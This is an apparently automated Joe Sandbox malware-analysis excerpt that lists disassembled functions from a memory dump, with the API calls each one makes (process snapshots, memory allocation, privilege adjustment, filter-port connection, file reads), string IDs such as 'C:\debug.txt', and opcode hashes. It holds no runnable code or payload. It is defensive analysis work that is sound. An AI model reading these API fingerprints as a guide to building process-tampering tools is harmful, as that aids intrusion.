                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$ProcessVirtual$AllocateCloseHandleInformationModule32OpenQuerySystem$AdjustCreateFirstFreeNextPrivilegeReadSnapshotToolhelp32_memset
                                                                                                                                      • String ID: D3DX81ab.dll$[$^
                                                                                                                                      • API String ID: 3593499547-4121992622
                                                                                                                                      • Opcode ID: 6e08a90894d58b6210e68721248e61770c82ccaa998e67e27660a72fd74464c8
                                                                                                                                      • Instruction ID: 650cd1228aee4f1286dd1a8516a4aafb5b75db2bdcc41e408581ad386b4f120e
                                                                                                                                      • Opcode Fuzzy Hash: 6e08a90894d58b6210e68721248e61770c82ccaa998e67e27660a72fd74464c8
                                                                                                                                      • Instruction Fuzzy Hash: F701D221608390AADB10D7299C44B5FBFD56FD7625F18C61DF8E897292E370C909C3A3
                                                                                                                                      Function 69E88409 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E88424
                                                                                                                                      • OutputDebugStringA.KERNEL32(wrong list), ref: 69E8843E
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E88445
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s
                                                                                                                                      • String ID: C:\debug.txt$wrong list
                                                                                                                                      • API String ID: 4089825709-1931324922
                                                                                                                                      • Opcode ID: 657fd2ec80ddf82eba67d1cec39e54d32ba406ddf36864c75f8a9031377b5219
                                                                                                                                      • Instruction ID: 80b33e7029c7f4dd7fd5a94f1ae97c7a326ad7602548ab98418abf9b6a926190
                                                                                                                                      • Opcode Fuzzy Hash: 657fd2ec80ddf82eba67d1cec39e54d32ba406ddf36864c75f8a9031377b5219
                                                                                                                                      • Instruction Fuzzy Hash: EAF050758043405ECB06EBB8DA4139D3BA0AF45254F204C5FD40DC7242DA3D5408D7E3
                                                                                                                                      Function 69E82010 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E82036
                                                                                                                                      • OutputDebugStringA.KERNEL32(out), ref: 69E82052
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E82059
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s
                                                                                                                                      • String ID: C:\pl.txt$out
                                                                                                                                      • API String ID: 4089825709-3113491540
                                                                                                                                      • Opcode ID: 1255c4039a0064eeffd05930b9cfd397af391be1ee100e3a52b02639ad6de58a
                                                                                                                                      • Instruction ID: bc6b3a11b9c1847d02788e2c7a72af4ae2dd70a043d1f25915c26f5feda71092
                                                                                                                                      • Opcode Fuzzy Hash: 1255c4039a0064eeffd05930b9cfd397af391be1ee100e3a52b02639ad6de58a
                                                                                                                                      • Instruction Fuzzy Hash: ECF0EC3A910200ABC711DBD4DD04B6EB7D4ABD9358F64881FF05457300C776E44ADB92
                                                                                                                                      Function 69ECFDAE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 69ECFDC8
                                                                                                                                        • Part of subcall function 69EC7833: __getptd_noexit.LIBCMT ref: 69EC7836
                                                                                                                                        • Part of subcall function 69EC7833: __amsg_exit.LIBCMT ref: 69EC7843
                                                                                                                                      • __getptd.LIBCMT ref: 69ECFDD9
                                                                                                                                      • __getptd.LIBCMT ref: 69ECFDE7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                      • String ID: MOC$csm
                                                                                                                                      • API String ID: 803148776-1389381023
                                                                                                                                      • Opcode ID: 8d89dc5df5b2f3e3046f6783b2dabc0a2ea28f2521e92264ab367ae9b789019c
                                                                                                                                      • Instruction ID: 0ca5967c9f24dc2746c16adee906dc820f941d44aa9135695f995fbd4ebf5fbd
                                                                                                                                      • Opcode Fuzzy Hash: 8d89dc5df5b2f3e3046f6783b2dabc0a2ea28f2521e92264ab367ae9b789019c
                                                                                                                                      • Instruction Fuzzy Hash: 35E0863A100214DFD300DBA8C245F5837A5FB5531CF3655A5DAACC7322D739D891DA93
                                                                                                                                      Function 69E88900 Relevance: 7.7, APIs: 5, Instructions: 173COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E88957
                                                                                                                                      • _memset.LIBCMT ref: 69E8896E
                                                                                                                                        • Part of subcall function 69E88690: _memset.LIBCMT ref: 69E886D2
                                                                                                                                        • Part of subcall function 69E88690: _memset.LIBCMT ref: 69E886E5
                                                                                                                                        • Part of subcall function 69E88690: _memset.LIBCMT ref: 69E88761
                                                                                                                                        • Part of subcall function 69E88690: _memset.LIBCMT ref: 69E8877A
                                                                                                                                      • _memset.LIBCMT ref: 69E889F6
                                                                                                                                      • _strncat.LIBCMT ref: 69E88A24
                                                                                                                                      • FilterConnectCommunicationPort.FLTLIB(00000000,00000000,00000000,00000000,00000000,69EEFAE4), ref: 69E88A5C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$CommunicationConnectFilterPort_strncat
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1005276894-0
                                                                                                                                      • Opcode ID: 755480f3bb7a4f56aaef4a34e45a9d730bd064bd1a7b8fca5b6114717d4a0f7a
                                                                                                                                      • Instruction ID: b53ebe845a7cb7576de8112a2146fc32fb556b6729756edf4ac0033fb3299d9e
                                                                                                                                      • Opcode Fuzzy Hash: 755480f3bb7a4f56aaef4a34e45a9d730bd064bd1a7b8fca5b6114717d4a0f7a
                                                                                                                                      • Instruction Fuzzy Hash: D151D2B55083819FD710CFA4CC84A9BB3E9BF84318F244F2DE5A9C7290EB349909C792
                                                                                                                                      Function 69E85D10 Relevance: 7.6, APIs: 5, Instructions: 133fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E85D53
                                                                                                                                        • Part of subcall function 69E85B80: _memset.LIBCMT ref: 69E85BA6
                                                                                                                                        • Part of subcall function 69E85B80: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,00000000), ref: 69E85BBE
                                                                                                                                        • Part of subcall function 69E85B80: ReadFile.KERNEL32(?,00000000,00000300,00000000,00000000,?,00000000,00000000,00000000,?,?,00000000), ref: 69E85BD5
                                                                                                                                      • GetFileSize.KERNEL32(?,?), ref: 69E85D7A
                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 69E85D9C
                                                                                                                                      • _memset.LIBCMT ref: 69E85DD1
                                                                                                                                      • ReadFile.KERNEL32(?,?,00001000,?,00000000,00000000,?,?), ref: 69E85DE7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$_memset$PointerRead$Size
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1098985663-0
                                                                                                                                      • Opcode ID: bff3fb90437d9599999232094a020f703dc4c7dc054f86a988d5533e98323c9d
                                                                                                                                      • Instruction ID: 42b0804ecef8dad45c5ff10beb4d08d524661b0835b802043296f76e7d6b1ba8
                                                                                                                                      • Opcode Fuzzy Hash: bff3fb90437d9599999232094a020f703dc4c7dc054f86a988d5533e98323c9d
                                                                                                                                      • Instruction Fuzzy Hash: B541C0756483018FD300CF59DE806ABB7D6FBC9354FA4066DF88AD3740DE38D94996A2
                                                                                                                                      Function 69E922C0 Relevance: 7.6, APIs: 5, Instructions: 114synchronizationCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69E922D1
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      • _memset.LIBCMT ref: 69E922F3
                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,69E918DB,?), ref: 69E92303
                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000BB8,?,?,?,?,?,?,?,?,?,00000000,69E918DB,?), ref: 69E92373
                                                                                                                                      • _malloc.LIBCMT ref: 69E923C9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$AllocateCreateEventHeapObjectSingleWait_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 358140155-0
                                                                                                                                      • Opcode ID: 14eb5db06593f647559827f73398327d01f6c2c3a404ccda0de5008adeddb685
                                                                                                                                      • Instruction ID: 46890a2a519fc63e2b4dec6f2edaff67a07c9f3fb286976b801f264312935149
                                                                                                                                      • Opcode Fuzzy Hash: 14eb5db06593f647559827f73398327d01f6c2c3a404ccda0de5008adeddb685
                                                                                                                                      • Instruction Fuzzy Hash: 75314C75684302AFEB10CF249D41BEB77A4BF66718F24906CEC849B381DB75950AC7E1
                                                                                                                                      Function 69E9BA50 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                      • Opcode ID: 076fa582ab1802338e326044684a5ad14fdb3001745b43d3ee397c7cd7a9dea1
                                                                                                                                      • Instruction ID: 728e4300d1c2ff672cfc439441191fe02aede304caba2132fda0551156dfb3b5
                                                                                                                                      • Opcode Fuzzy Hash: 076fa582ab1802338e326044684a5ad14fdb3001745b43d3ee397c7cd7a9dea1
                                                                                                                                      • Instruction Fuzzy Hash: FD316474E186009BE760DB30D957B2E73E4AF89314FA4886DE15ECA285EB798448C783
                                                                                                                                      Function 69EC6179 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetFileType.KERNEL32(00000000,69EE8D48,0000000C,69EBD554,00000001,00004000,00000000,?,00000000,00000000,00000001,?,?,69EBDADC,?,00000001), ref: 69EC61AD
                                                                                                                                      • GetLastError.KERNEL32(?,?,69EBDADC,?,00000001,?,00000000,000000FF,00000000,00000018,69EB409F,00000001,?,00000001,00000000), ref: 69EC61B7
                                                                                                                                      • __dosmaperr.LIBCMT ref: 69EC61BE
                                                                                                                                      • __alloc_osfhnd.LIBCMT ref: 69EC61DF
                                                                                                                                      • __set_osfhnd.LIBCMT ref: 69EC6209
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 43408053-0
                                                                                                                                      • Opcode ID: 96a4149dace23c7243dfab2b8445ebc3f85c9a675da816ae8fe1dba015357327
                                                                                                                                      • Instruction ID: 25af455e3ddec1f4ab3707d00d4dfa097a7285aad630e5fecaf035d138d2c4b4
                                                                                                                                      • Opcode Fuzzy Hash: 96a4149dace23c7243dfab2b8445ebc3f85c9a675da816ae8fe1dba015357327
